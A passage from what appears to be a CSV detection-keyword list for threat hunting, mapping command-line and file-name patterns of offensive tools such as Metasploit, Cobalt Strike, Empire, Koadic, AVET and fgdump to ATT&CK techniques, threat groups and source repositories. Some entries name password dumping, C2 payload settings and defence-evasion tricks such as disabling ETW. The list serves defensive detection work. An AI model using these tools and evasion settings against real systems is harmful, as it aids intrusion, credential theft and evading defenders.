TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service_permissions_escalate.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ServiceHavoc.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*servicemove*hid.dll*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" +"*servpw.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*servpw64.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SessionGopher*","offensive_tool_keyword","SessionGopher","SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It has WMI functionality built in so it can be run remotely. Its best use case is to identify systems that may connect to Unix systems. jump boxes. or point-of-sale terminals.","T1081 - T1087 - T1119","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","1095","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z" +"*SessionGopher.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*set * virus_scanner*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*set AutoRunScript multi_console_command -rc /root/*.rc*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*set CertPath data/*","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*set CollectionMethodAll*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*set COMPlus_ETWEnabled=0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*set havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*set history +o*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*set hosts_stage*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*set keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set LFILE /*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Set Listener dbx*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*set Listener onedrive*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*set obfuscate *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set payload *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*set PAYLOAD *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*set pipename *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set Profile apt1.profile*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*set shellcode *","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*set smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set zombie *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*set_child werfault.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*set_command_exec exec_via_cmd*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_command_exec exec_via_powershell*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_command_exec no_command*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_command_source download_bitsadmin*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_decoder xor*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_empty_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" +"*set_injection_technique*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 